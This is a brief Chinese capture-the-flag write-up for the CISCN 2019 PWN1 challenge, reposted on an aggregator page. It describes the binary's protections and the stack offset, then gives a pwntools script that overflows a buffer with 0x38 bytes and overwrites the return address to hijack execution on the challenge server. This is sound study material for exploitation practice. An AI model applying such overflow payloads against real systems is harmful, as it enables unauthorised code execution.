当前位置: 首页 > news >正文

[CISCN 2019华北]PWN1-好久不见7

news 2025/6/26 0:12:39

Partial RELRO 表示部分 RELRO 保护已启用。在这种情况下,只有某些部分(如 GOT 中的只读部分)是只读的。

NX enabled 表示这个二进制文件启用了 NX 保护,数据段是不可执行的。这可以防止某些类型的代码注入攻击。

这里是ida识别出来的v1距离rbp的长度是0x30,然后程序是64位的需要距离返回地址还差8字节

from pwn import *
 
p = remote("node7.anna.nssctf.cn",20692)
 
payload = b"a" * 0x38 + p64(0x4006be)
 
p.sendline(payload)
 
p.interactive()

http://www.lryc.cn/news/475712.html

相关文章:

  • 代码随想录day16| 513找树左下角的值 、 路径总和 、 从中序与后序遍历序列构造二叉树
  • 使用 MMDetection 实现 Pascal VOC 数据集的目标检测项目练习(二) ubuntu的下载安装
  • 书生大模型实战营(第四期)——入门岛
  • 压强随着时间的变化
  • 2024年大厂AI大模型面试题精选与答案解析
  • Linux开发讲课47--- 详解 Linux 中的虚拟文件系统
  • 全球银行常用英语
  • 新160个crackme -090-tc.12
  • Swagger文档-Unable to scan documentation context default报错
  • SpringKafka生产者、消费者消息拦截
  • Qt报错QOCI driver not loaded且QOCI available的解决方法
  • python mac vscode 脚本文件的运行
  • Linux之du命令
  • WRF-LES与PALM微尺度气象大涡模拟
  • 桌面程序开发框架选择
  • Vue项目开发:Vuex使用,表单验证配置,ESLint关闭与常见问题解决方案
  • 源鲁杯2024赛题复现Web Misc部分WP
  • 【企业微信新版sdk】
  • web安全测试渗透案例知识点总结(下)——小白入狱
  • 【专题】数据库的安全性
  • 【含开题报告+文档+源码】基于Java的房屋租赁服务系统设计与实现
  • 数据结构模拟题[十]
  • Java基于微信小程序的美食推荐系统(附源码,文档)
  • 基于CNN-RNN的影像报告生成
  • MacOS如何读取磁盘原始的扇区内容,恢复误删除的数据
  • 创客匠人:打造IP陷入迷茫?20位大咖直播如何破局,实现财富增长
  • 视觉目标检测标注xml格式文件解析可视化 - python 实现
  • clion远程配置docker ros2
  • 微信小程序 uniapp 腾讯地图的调用
  • OLAP平台架构演化历程